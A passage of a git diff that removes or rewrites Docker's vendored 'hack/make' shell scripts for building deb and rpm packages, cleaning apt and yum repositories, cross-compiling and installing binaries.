+copy_binaries "$DEST" 'hash'
diff --git a/vendor/github.com/docker/docker/hack/make/build-deb b/vendor/github.com/docker/docker/hack/make/build-deb
deleted file mode 100644
index d3c28591a6..0000000000
--- a/vendor/github.com/docker/docker/hack/make/build-deb
+++ /dev/null
@@ -1,91 +0,0 @@
-#!/bin/bash
-set -e
-
-# subshell so that we can export PATH and TZ without breaking other things
-(
-	export TZ=UTC # make sure our "date" variables are UTC-based
-	bundle .integration-daemon-start
-	bundle .detect-daemon-osarch
-
-	# TODO consider using frozen images for the dockercore/builder-deb tags
-
-	tilde='~' # ouch Bash 4.2 vs 4.3, you keel me
-	debVersion="${VERSION//-/$tilde}" # using \~ or '~' here works in 4.3, but not 4.2; just ~ causes $HOME to be inserted, hence the $tilde
-	# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better
-	if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
-		gitUnix="$(git log -1 --pretty='%at')"
-		gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')"
-		gitCommit="$(git log -1 --pretty='%h')"
-		gitVersion="git${gitDate}.0.${gitCommit}"
-		# gitVersion is now something like 'git20150128.112847.0.17e840a'
-		debVersion="$debVersion~$gitVersion"
-
-		# $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false
-		# true
-		# $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false
-		# true
-		# $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false
-		# true
-
-		# ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a
-	fi
-
-	debSource="$(awk -F ': ' '$1 == "Source" { print $2; exit }' hack/make/.build-deb/control)"
-	debMaintainer="$(awk -F ': ' '$1 == "Maintainer" { print $2; exit }' hack/make/.build-deb/control)"
-	debDate="$(date --rfc-2822)"
-
-	# if go-md2man is available, pre-generate the man pages
-	make manpages
-
-	builderDir="contrib/builder/deb/${PACKAGE_ARCH}"
-	pkgs=( $(find "${builderDir}/"*/ -type d) )
-	if [ ! -z "$DOCKER_BUILD_PKGS" ]; then
-		pkgs=()
-		for p in $DOCKER_BUILD_PKGS; do
-			pkgs+=( "$builderDir/$p" )
-		done
-	fi
-	for dir in "${pkgs[@]}"; do
-		[ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; }
-		version="$(basename "$dir")"
-		suite="${version##*-}"
-
-		image="dockercore/builder-deb:$version"
-		if ! docker inspect "$image" &> /dev/null; then
-			(
-				# Add the APT_MIRROR args only if the consuming Dockerfile uses it
-				# Otherwise this will cause the build to fail
-				if [ "$(grep 'ARG APT_MIRROR=' $dir/Dockerfile)" ] && [ "$BUILD_APT_MIRROR" ]; then
-					DOCKER_BUILD_ARGS="$DOCKER_BUILD_ARGS $BUILD_APT_MIRROR"
-				fi
-				set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir"
-			)
-		fi
-
-		mkdir -p "$DEST/$version"
-		cat > "$DEST/$version/Dockerfile.build" <<-EOF
-			FROM $image
-			WORKDIR /usr/src/docker
-			COPY . /usr/src/docker
-			ENV DOCKER_GITCOMMIT $GITCOMMIT
-			RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers \
-				&& ln -snf /usr/src/docker /go/src/github.com/docker/docker
-		EOF
-
-		cat >> "$DEST/$version/Dockerfile.build" <<-EOF
-			# Install runc, containerd, proxy and tini
-			RUN ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini
-		EOF
-		cat >> "$DEST/$version/Dockerfile.build" <<-EOF
-			RUN cp -aL hack/make/.build-deb debian
-			RUN { echo '$debSource (${debVersion}-0~${version}) $suite; urgency=low'; echo; echo '  * Version: $VERSION'; echo; echo " -- $debMaintainer  $debDate"; } > debian/changelog && cat >&2 debian/changelog
-			RUN dpkg-buildpackage -uc -us -I.git
-		EOF
-		tempImage="docker-temp/build-deb:$version"
-		( set -x && docker build -t "$tempImage" -f "$DEST/$version/Dockerfile.build" . )
-		docker run --rm "$tempImage" bash -c 'cd .. && tar -c *_*' | tar -xvC "$DEST/$version"
-		docker rmi "$tempImage"
-	done
-
-	bundle .integration-daemon-stop
-) 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary
old mode 100644
new mode 100755
index 2039be416f..bbd5a22bcc
--- a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary
+++ b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary
@@ -1,11 +1,7 @@
-#!/bin/bash
+#!/usr/bin/env bash
+# required by `make build-integration-cli-on-swarm`
 set -e
 
-rm -rf "$DEST"
-DEST="$DEST/../test-integration-cli"
+source hack/make/.integration-test-helpers
 
-if [ -z $DOCKER_INTEGRATION_TESTS_VERIFIED ]; then
-	source ${MAKEDIR}/.integration-test-helpers
-	ensure_test_dir integration-cli "$DEST/test.main"
-	export DOCKER_INTEGRATION_TESTS_VERIFIED=1
-fi
+build_test_suite_binaries
diff --git a/vendor/github.com/docker/docker/hack/make/build-rpm b/vendor/github.com/docker/docker/hack/make/build-rpm
deleted file mode 100644
index 7fec059392..0000000000
--- a/vendor/github.com/docker/docker/hack/make/build-rpm
+++ /dev/null
@@ -1,148 +0,0 @@
-#!/bin/bash
-set -e
-
-# subshell so that we can export PATH and TZ without breaking other things
-(
-	export TZ=UTC # make sure our "date" variables are UTC-based
-
-	source "$(dirname "$BASH_SOURCE")/.integration-daemon-start"
-	source "$(dirname "$BASH_SOURCE")/.detect-daemon-osarch"
-
-	# TODO consider using frozen images for the dockercore/builder-rpm tags
-
-	rpmName=docker-engine
-	rpmVersion="$VERSION"
-	rpmRelease=1
-
-	# rpmRelease versioning is as follows
-	# Docker 1.7.0:  version=1.7.0, release=1
-	# Docker 1.7.0-rc1: version=1.7.0, release=0.1.rc1
-	# Docker 1.7.0-cs1: version=1.7.0.cs1, release=1
-	# Docker 1.7.0-cs1-rc1: version=1.7.0.cs1, release=0.1.rc1
-	# Docker 1.7.0-dev nightly: version=1.7.0, release=0.0.YYYYMMDD.HHMMSS.gitHASH
-
-	# if we have a "-rc*" suffix, set appropriate release
-	if [[ "$rpmVersion" =~ .*-rc[0-9]+$ ]] ; then
-		rcVersion=${rpmVersion#*-rc}
-		rpmVersion=${rpmVersion%-rc*}
-		rpmRelease="0.${rcVersion}.rc${rcVersion}"
-	fi
-
-	DOCKER_GITCOMMIT=$(git rev-parse --short HEAD)
-	if [ -n "$(git status --porcelain --untracked-files=no)" ]; then
-		DOCKER_GITCOMMIT="$DOCKER_GITCOMMIT-unsupported"
-	fi
-
-	# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better
-	if [[ "$rpmVersion" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
-		gitUnix="$(git log -1 --pretty='%at')"
-		gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')"
-		gitCommit="$(git log -1 --pretty='%h')"
-		gitVersion="${gitDate}.git${gitCommit}"
-		# gitVersion is now something like '20150128.112847.17e840a'
-		rpmVersion="${rpmVersion%-dev}"
-		rpmRelease="0.0.$gitVersion"
-	fi
-
-	# Replace any other dashes with periods
-	rpmVersion="${rpmVersion/-/.}"
-
-	rpmPackager="$(awk -F ': ' '$1 == "Packager" { print $2; exit }' hack/make/.build-rpm/${rpmName}.spec)"
-	rpmDate="$(date +'%a %b %d %Y')"
-
-	# if go-md2man is available, pre-generate the man pages
-	make manpages
-
-	# Convert the CHANGELOG.md file into RPM changelog format
-	VERSION_REGEX="^\W\W (.*) \((.*)\)$"
-	ENTRY_REGEX="^[-+*] (.*)$"
-	while read -r line || [[ -n "$line" ]]; do
-		if [ -z "$line" ]; then continue; fi
-		if [[ "$line" =~ $VERSION_REGEX ]]; then
-			echo >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog
-			echo "* `date -d ${BASH_REMATCH[2]} '+%a %b %d %Y'` ${rpmPackager} - ${BASH_REMATCH[1]}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog
-		fi
-		if [[ "$line" =~ $ENTRY_REGEX ]]; then
-			echo "- ${BASH_REMATCH[1]//\`}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog
-		fi
-	done < CHANGELOG.md
-
-	builderDir="contrib/builder/rpm/${PACKAGE_ARCH}"
-	pkgs=( $(find "${builderDir}/"*/ -type d) )
-	if [ ! -z "$DOCKER_BUILD_PKGS" ]; then
-		pkgs=()
-		for p in $DOCKER_BUILD_PKGS; do
-			pkgs+=( "$builderDir/$p" )
-		done
-	fi
-	for dir in "${pkgs[@]}"; do
-		[ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; }
-		version="$(basename "$dir")"
-		suite="${version##*-}"
-
-		image="dockercore/builder-rpm:$version"
-		if ! docker inspect "$image" &> /dev/null; then
-			( set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" )
-		fi
-
-		mkdir -p "$DEST/$version"
-		cat > "$DEST/$version/Dockerfile.build" <<-EOF
-			FROM $image
-			COPY . /usr/src/${rpmName}
-			WORKDIR /usr/src/${rpmName}
-			RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers
-		EOF
-
-		cat >> "$DEST/$version/Dockerfile.build" <<-EOF
-			# Install runc, containerd, proxy and tini
-			RUN TMP_GOPATH="/go" ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini
-		EOF
-		if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
-			echo 'ENV DOCKER_EXPERIMENTAL 1' >> "$DEST/$version/Dockerfile.build"
-		fi
-		cat >> "$DEST/$version/Dockerfile.build" <<-EOF
-			RUN mkdir -p /root/rpmbuild/SOURCES \
-				&& echo '%_topdir /root/rpmbuild' > /root/.rpmmacros
-			WORKDIR /root/rpmbuild
-			RUN ln -sfv /usr/src/${rpmName}/hack/make/.build-rpm SPECS
-			WORKDIR /root/rpmbuild/SPECS
-			RUN tar --exclude .git -r -C /usr/src -f /root/rpmbuild/SOURCES/${rpmName}.tar ${rpmName}
-			RUN tar --exclude .git -r -C /go/src/github.com/docker -f /root/rpmbuild/SOURCES/${rpmName}.tar containerd
-			RUN tar --exclude .git -r -C /go/src/github.com/docker/libnetwork/cmd -f /root/rpmbuild/SOURCES/${rpmName}.tar proxy
-			RUN tar --exclude .git -r -C /go/src/github.com/opencontainers -f /root/rpmbuild/SOURCES/${rpmName}.tar runc
-			RUN tar --exclude .git -r -C /go/ -f /root/rpmbuild/SOURCES/${rpmName}.tar tini
-			RUN gzip /root/rpmbuild/SOURCES/${rpmName}.tar
-			RUN { cat /usr/src/${rpmName}/contrib/builder/rpm/${PACKAGE_ARCH}/changelog; } >> ${rpmName}.spec && tail >&2 ${rpmName}.spec
-			RUN rpmbuild -ba \
-				--define '_gitcommit $DOCKER_GITCOMMIT' \
-				--define '_release $rpmRelease' \
-				--define '_version $rpmVersion' \
-				--define '_origversion $VERSION' \
-				--define '_experimental ${DOCKER_EXPERIMENTAL:-0}' \
-				${rpmName}.spec
-		EOF
-		# selinux policy referencing systemd things won't work on non-systemd versions
-		# of centos or rhel, which we don't support anyways
-		if [ "${suite%.*}" -gt 6 ] && [[ "$version" != opensuse* ]]; then
-			selinuxDir="selinux"
-			if [ -d "./contrib/selinux-$version" ]; then
-				selinuxDir="selinux-${version}"
-			fi
-			cat >> "$DEST/$version/Dockerfile.build" <<-EOF
-				RUN tar -cz -C /usr/src/${rpmName}/contrib/${selinuxDir} -f /root/rpmbuild/SOURCES/${rpmName}-selinux.tar.gz ${rpmName}-selinux
-				RUN rpmbuild -ba \
-						--define '_gitcommit $DOCKER_GITCOMMIT' \
-						--define '_release $rpmRelease' \
-						--define '_version $rpmVersion' \
-						--define '_origversion $VERSION' \
-						${rpmName}-selinux.spec
-			EOF
-		fi
-		tempImage="docker-temp/build-rpm:$version"
-		( set -x && docker build -t "$tempImage" -f $DEST/$version/Dockerfile.build . )
-		docker run --rm "$tempImage" bash -c 'cd /root/rpmbuild && tar -c *RPMS' | tar -xvC "$DEST/$version"
-		docker rmi "$tempImage"
-	done
-
-	source "$(dirname "$BASH_SOURCE")/.integration-daemon-stop"
-) 2>&1 | tee -a $DEST/test.log
diff --git a/vendor/github.com/docker/docker/hack/make/clean-apt-repo b/vendor/github.com/docker/docker/hack/make/clean-apt-repo
deleted file mode 100755
index 1c37d98e40..0000000000
--- a/vendor/github.com/docker/docker/hack/make/clean-apt-repo
+++ /dev/null
@@ -1,43 +0,0 @@
-#!/bin/bash
-set -e
-
-# This script cleans the experimental pool for the apt repo.
-# This is useful when there are a lot of old experimental debs and you only want to keep the most recent.
-#
-
-: ${DOCKER_RELEASE_DIR:=$DEST}
-APTDIR=$DOCKER_RELEASE_DIR/apt/repo/pool/experimental
-: ${DOCKER_ARCHIVE_DIR:=$DEST/archive}
-DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-
-latest_versions=$(dpkg-scanpackages "$APTDIR" /dev/null 2>/dev/null | awk -F ': ' '$1 == "Filename" { print $2 }')
-
-# get the latest version
-latest_docker_engine_file=$(echo "$latest_versions" | grep docker-engine)
-latest_docker_engine_version=$(basename ${latest_docker_engine_file%~*})
-
-echo "latest docker-engine version: $latest_docker_engine_version"
-
-# remove all the files that are not that version in experimental
-pool_dir=$(dirname "$latest_docker_engine_file")
-old_pkgs=( $(ls "$pool_dir" | grep -v "^${latest_docker_engine_version}" | grep "${latest_docker_engine_version%%~git*}") )
-
-echo "${old_pkgs[@]}"
-
-mkdir -p "$DOCKER_ARCHIVE_DIR"
-for old_pkg in "${old_pkgs[@]}"; do
-	echo "moving ${pool_dir}/${old_pkg} to $DOCKER_ARCHIVE_DIR"
-	mv "${pool_dir}/${old_pkg}" "$DOCKER_ARCHIVE_DIR"
-done
-
-echo
-echo "$pool_dir now has contents:"
-ls "$pool_dir"
-
-# now regenerate release files for experimental
-export COMPONENT=experimental
-source "${DIR}/update-apt-repo"
-
-echo "You will now want to: "
-echo "   - re-sign the repo with hack/make/sign-repo"
-echo "   - re-generate index files with hack/make/generate-index-listing"
diff --git a/vendor/github.com/docker/docker/hack/make/clean-yum-repo b/vendor/github.com/docker/docker/hack/make/clean-yum-repo
deleted file mode 100755
index 1cafbbd97f..0000000000
--- a/vendor/github.com/docker/docker/hack/make/clean-yum-repo
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/bin/bash
-set -e
-
-# This script cleans the experimental pool for the yum repo.
-# This is useful when there are a lot of old experimental rpms and you only want to keep the most recent.
-#
-
-: ${DOCKER_RELEASE_DIR:=$DEST}
-YUMDIR=$DOCKER_RELEASE_DIR/yum/repo/experimental
-
-suites=( $(find "$YUMDIR" -mindepth 1 -maxdepth 1 -type d) )
-
-for suite in "${suites[@]}"; do
-	echo "cleanup in: $suite"
-	( set -x; repomanage -k2 --old "$suite" | xargs rm -f )
-done
-
-echo "You will now want to: "
-echo "   - re-sign the repo with hack/make/sign-repo"
-echo "   - re-generate index files with hack/make/generate-index-listing"
diff --git a/vendor/github.com/docker/docker/hack/make/cover b/vendor/github.com/docker/docker/hack/make/cover
deleted file mode 100644
index 08e28e3fea..0000000000
--- a/vendor/github.com/docker/docker/hack/make/cover
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/bin/bash
-set -e
-
-bundle_cover() {
-	coverprofiles=( "$DEST/../"*"/coverprofiles/"* )
-	for p in "${coverprofiles[@]}"; do
-		echo
-		(
-			set -x
-			go tool cover -func="$p"
-		)
-	done
-}
-
-bundle_cover 2>&1 | tee "$DEST/report.log"
diff --git a/vendor/github.com/docker/docker/hack/make/cross b/vendor/github.com/docker/docker/hack/make/cross
index 6d672b17c3..85dd3c637f 100644
--- a/vendor/github.com/docker/docker/hack/make/cross
+++ b/vendor/github.com/docker/docker/hack/make/cross
@@ -1,46 +1,29 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
-# explicit list of os/arch combos that support being a daemon
-declare -A daemonSupporting
-daemonSupporting=(
-	[linux/amd64]=1
-	[windows/amd64]=1
-)
-
 # if we have our linux/amd64 version compiled, let's symlink it in
 if [ -x "$DEST/../binary-daemon/dockerd-$VERSION" ]; then
 	arch=$(go env GOHOSTARCH)
 	mkdir -p "$DEST/linux/${arch}"
 	(
 		cd "$DEST/linux/${arch}"
-		ln -s ../../../binary-daemon/* ./
-		ln -s ../../../binary-client/* ./
+		ln -sf ../../../binary-daemon/* ./
 	)
 	echo "Created symlinks:" "$DEST/linux/${arch}/"*
 fi
 
+DOCKER_CROSSPLATFORMS=${DOCKER_CROSSPLATFORMS:-"linux/amd64 windows/amd64"}
+
 for platform in $DOCKER_CROSSPLATFORMS; do
 	(
 		export KEEPDEST=1
 		export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION
-		mkdir -p "$DEST"
-		ABS_DEST="$(cd "$DEST" && pwd -P)"
 		export GOOS=${platform%/*}
 		export GOARCH=${platform##*/}
 
-		if [ "$GOOS" != "solaris" ]; then
-			# TODO. Solaris cannot be cross build because of CGO calls.
-			if [ -z "${daemonSupporting[$platform]}" ]; then
-				# we just need a simple client for these platforms
-				export LDFLAGS_STATIC_DOCKER=""
-				# remove the "daemon" build tag from platforms that aren't supported
-				export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" )
-				source "${MAKEDIR}/binary-client"
-			else
-				source "${MAKEDIR}/binary-client"
-				source "${MAKEDIR}/binary-daemon"
-			fi
-		fi
+		echo "Cross building: $DEST"
+		mkdir -p "$DEST"
+		ABS_DEST="$(cd "$DEST" && pwd -P)"
+		source "${MAKEDIR}/binary-daemon"
 	)
 done
diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary b/vendor/github.com/docker/docker/hack/make/dynbinary
index 1a435dc4bf..981e505e9f 100644
--- a/vendor/github.com/docker/docker/hack/make/dynbinary
+++ b/vendor/github.com/docker/docker/hack/make/dynbinary
@@ -1,12 +1,7 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
 # This script exists as backwards compatibility for CI
-(
-    DEST="${DEST}-client"
-    ABS_DEST="${ABS_DEST}-client"
-    . hack/make/dynbinary-client
-)
 (
 
     DEST="${DEST}-daemon"
diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-client b/vendor/github.com/docker/docker/hack/make/dynbinary-client
deleted file mode 100644
index e4b7741848..0000000000
--- a/vendor/github.com/docker/docker/hack/make/dynbinary-client
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/bin/bash
-set -e
-
-(
-	export BINARY_SHORT_NAME='docker'
-	export GO_PACKAGE='github.com/docker/docker/cmd/docker'
-	export IAMSTATIC='false'
-	export LDFLAGS_STATIC_DOCKER=''
-	export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary
-	export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here
-	source "${MAKEDIR}/.binary"
-)
diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon
index 090a916f65..d1c0070e62 100644
--- a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon
+++ b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon
@@ -1,9 +1,7 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
 (
-	export BINARY_SHORT_NAME='dockerd'
-	export GO_PACKAGE='github.com/docker/docker/cmd/dockerd'
 	export IAMSTATIC='false'
 	export LDFLAGS_STATIC_DOCKER=''
 	export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary
diff --git a/vendor/github.com/docker/docker/hack/make/generate-index-listing b/vendor/github.com/docker/docker/hack/make/generate-index-listing
deleted file mode 100755
index ec44171f81..0000000000
--- a/vendor/github.com/docker/docker/hack/make/generate-index-listing
+++ /dev/null
@@ -1,74 +0,0 @@
-#!/bin/bash
-set -e
-
-# This script generates index files for the directory structure
-# of the apt and yum repos
-
-: ${DOCKER_RELEASE_DIR:=$DEST}
-APTDIR=$DOCKER_RELEASE_DIR/apt
-YUMDIR=$DOCKER_RELEASE_DIR/yum
-
-if [ ! -d $APTDIR ] && [ ! -d $YUMDIR ]; then
-	echo >&2 'release-rpm or release-deb must be run before generate-index-listing'
-	exit 1
-fi
-
-create_index() {
-	local directory=$1
-	local original=$2
-	local cleaned=${directory#$original}
-
-	# the index file to create
-	local index_file="${directory}/index"
-
-	# cd into dir & touch the index file
-	cd $directory
-	touch $index_file
-
-	# print the html header
-	cat <<-EOF > "$index_file"
-	<!DOCTYPE html>
-	<html>
-	<head><title>Index of ${cleaned}/</title></head>
-	<body bgcolor="white">
-	<h1>Index of ${cleaned}/</h1><hr>
-	<pre><a href="../">../</a>
-	EOF
-
-	# start of content output
-	(
-	# change IFS locally within subshell so the for loop saves line correctly to L var
-	IFS=$'\n';
-
-	# pretty sweet, will mimick the normal apache output. skipping "index" and hidden files
-	for L in $(find -L . -mount -depth -maxdepth 1 -type f ! -name 'index' ! -name '.*' -prune -printf "<a href=\"%f\">%f|@_@%Td-%Tb-%TY %Tk:%TM  @%f@\n"|sort|column -t -s '|' | sed 's,\([\ ]\+\)@_@,</a>\1,g');
-	do
-		# file
-		F=$(sed -e 's,^.*@\([^@]\+\)@.*$,\1,g'<<<"$L");
-
-		# file with file size
-		F=$(du -bh $F | cut -f1);
-
-		# output with correct format
-		sed -e 's,\ @.*$, '"$F"',g'<<<"$L";
-	done;
-	) >> $index_file;
-
-	# now output a list of all directories in this dir (maxdepth 1) other than '.' outputting in a sorted manner exactly like apache
-	find -L . -mount -depth -maxdepth 1 -type d ! -name '.' -printf "<a href=\"%f\">%-43f@_@%Td-%Tb-%TY %Tk:%TM  -\n"|sort -d|sed 's,\([\ ]\+\)@_@,/</a>\1,g' >> $index_file
-
-	# print the footer html
-	echo "</pre><hr></body></html>" >> $index_file
-
-}
-
-get_dirs() {
-	local directory=$1
-
-	for d in `find ${directory} -type d`; do
-		create_index $d $directory
-	done
-}
-
-get_dirs $APTDIR
-get_dirs $YUMDIR
diff --git a/vendor/github.com/docker/docker/hack/make/install-binary b/vendor/github.com/docker/docker/hack/make/install-binary
index 82cbc79933..f6a4361fdb 100644
--- a/vendor/github.com/docker/docker/hack/make/install-binary
+++ b/vendor/github.com/docker/docker/hack/make/install-binary
@@ -1,12 +1,29 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 set -e
 rm -rf "$DEST"
 
-(
-	source "${MAKEDIR}/install-binary-client"
-)
+install_binary() {
+	local file="$1"
+	local target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/"
+	if [ "$(go env GOOS)" == "linux" ]; then
+		echo "Installing $(basename $file) to ${target}"
+		mkdir -p "$target"
+		cp -f -L "$file" "$target"
+	else
+		echo "Install is only supported on linux"
+		return 1
+	fi
+}
 
 (
-	source "${MAKEDIR}/install-binary-daemon"
+	DEST="$(dirname $DEST)/binary-daemon"
+	source "${MAKEDIR}/.binary-setup"
+	install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}"
+	install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}"
 )
diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-client b/vendor/github.com/docker/docker/hack/make/install-binary-client
deleted file mode 100644
index 6c80452659..0000000000
--- a/vendor/github.com/docker/docker/hack/make/install-binary-client
+++ /dev/null
@@ -1,10 +0,0 @@
-#!/bin/bash
-
-set -e
-rm -rf "$DEST"
-
-(
-	DEST="$(dirname $DEST)/binary-client"
-	source "${MAKEDIR}/.binary-setup"
-	install_binary "${DEST}/${DOCKER_CLIENT_BINARY_NAME}"
-)
diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-daemon b/vendor/github.com/docker/docker/hack/make/install-binary-daemon
deleted file mode 100644
index 08a2d69b96..0000000000
--- a/vendor/github.com/docker/docker/hack/make/install-binary-daemon
+++ /dev/null
@@ -1,16 +0,0 @@
-#!/bin/bash
-
-set -e
-rm -rf "$DEST"
-
-(
-	DEST="$(dirname $DEST)/binary-daemon"
-	source "${MAKEDIR}/.binary-setup"
-	install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}"
-	install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}"
-	install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}"
-	install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}"
-	install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}"
-	install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}"
-	install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}"
-)
diff --git a/vendor/github.com/docker/docker/hack/make/install-script b/vendor/github.com/docker/docker/hack/make/install-script
deleted file mode 100644
index feadac2f38..0000000000
--- a/vendor/github.com/docker/docker/hack/make/install-script
+++ /dev/null
@@ -1,63 +0,0 @@
-#!/bin/bash
-set -e
-
-# This script modifies the install.sh script for domains and keys other than
-# those used by the primary opensource releases.
-#
-# You can provide `url`, `yum_url`, `apt_url` and optionally `gpg_fingerprint`
-# or `GPG_KEYID` as environment variables, or the defaults for open source are used.
-#
-# The lower-case variables are substituted into install.sh.
-#
-# gpg_fingerprint and GPG_KEYID are optional, defaulting to the opensource release
-# key ("releasedocker"). Other GPG_KEYIDs will require you to mount a volume with
-# the correct contents to /root/.gnupg.
-#
-# It outputs the modified `install.sh` file to $DOCKER_RELEASE_DIR (default: $DEST)
-#
-# Example usage:
-#
-# docker run \
-# --rm \
-# --privileged \
-# -e "GPG_KEYID=deadbeef" \
-# -e "GNUPGHOME=/root/.gnupg" \
-# -v $HOME/.gnupg:/root/.gnupg \
-# -v $(pwd):/go/src/github.com/docker/docker/bundles \
-# "$IMAGE_DOCKER" \
-# hack/make.sh install-script
-
-: ${DOCKER_RELEASE_DIR:=$DEST}
-: ${GPG_KEYID:=releasedocker}
-
-DEFAULT_URL="https://get.docker.com/"
-DEFAULT_APT_URL="https://apt.dockerproject.org"
-DEFAULT_YUM_URL="https://yum.dockerproject.org"
-DEFAULT_GPG_FINGERPRINT="58118E89F3A912897C070ADBF76221572C52609D"
-
-: ${url:=$DEFAULT_URL}
-: ${apt_url:=$DEFAULT_APT_URL}
-: ${yum_url:=$DEFAULT_YUM_URL}
-if [[ "$GPG_KEYID" == "releasedocker" ]] ; then
-	: ${gpg_fingerprint:=$DEFAULT_GPG_FINGERPRINT}
-fi
-
-DEST_FILE="$DOCKER_RELEASE_DIR/install.sh"
-
-bundle_install_script() {
-	mkdir -p "$DOCKER_RELEASE_DIR"
-
-	if [[ -z "$gpg_fingerprint" ]] ; then
-		# NOTE: if no key matching key is in /root/.gnupg, this will fail
-		gpg_fingerprint=$(gpg --with-fingerprint -k "$GPG_KEYID" | grep "Key fingerprint" | awk -F "=" '{print $2};' | tr -d ' ')
-	fi
-
-	cp hack/install.sh "$DEST_FILE"
-	sed -i.bak 's#^url=".*"$#url="'"$url"'"#' "$DEST_FILE"
-	sed -i.bak 's#^apt_url=".*"$#apt_url="'"$apt_url"'"#' "$DEST_FILE"
-	sed -i.bak 's#^yum_url=".*"$#yum_url="'"$yum_url"'"#' "$DEST_FILE"
-	sed -i.bak 's#^gpg_fingerprint=".*"$#gpg_fingerprint="'"$gpg_fingerprint"'"#' "$DEST_FILE"
-	rm "${DEST_FILE}.bak"
-}
-
-bundle_install_script
diff --git a/vendor/github.com/docker/docker/hack/make/release-deb b/vendor/github.com/docker/docker/hack/make/release-deb
deleted file mode 100755
index ed65fe2f5f..0000000000
--- a/vendor/github.com/docker/docker/hack/make/release-deb
+++ /dev/null
@@ -1,163 +0,0 @@
-#!/bin/bash
-set -e
-
-# This script creates the apt repos for the .deb files generated by hack/make/build-deb
-#
-# The following can then be used as apt sources:
-# 	deb http://apt.dockerproject.org/repo $distro-$release $version
-#
-# For example:
-#	deb http://apt.dockerproject.org/repo ubuntu-trusty main
-#	deb http://apt.dockerproject.org/repo ubuntu-trusty testing
-#	deb http://apt.dockerproject.org/repo debian-wheezy experimental
-#	deb http://apt.dockerproject.org/repo debian-jessie main
-#
-# ... and so on and so forth for the builds created by hack/make/build-deb
-
-: ${DOCKER_RELEASE_DIR:=$DEST}
-: ${GPG_KEYID:=releasedocker}
-APTDIR=$DOCKER_RELEASE_DIR/apt/repo
-
-# setup the apt repo (if it does not exist)
-mkdir -p "$APTDIR/conf" "$APTDIR/db" "$APTDIR/dists"
-
-# supported arches/sections
-arches=( amd64 i386 armhf )
-
-# Preserve existing components but don't add any non-existing ones
-for component in main testing experimental ; do
-	exists=$(find "$APTDIR/dists" -mindepth 2 -maxdepth 2 -type d -name "$component" -print -quit)
-	if [ -n "$exists" ] ; then
-		components+=( $component )
-	fi
-done
-
-# set the component for the version being released
-component="main"
-
-if [[ "$VERSION" == *-rc* ]]; then
-	component="testing"
-fi
-
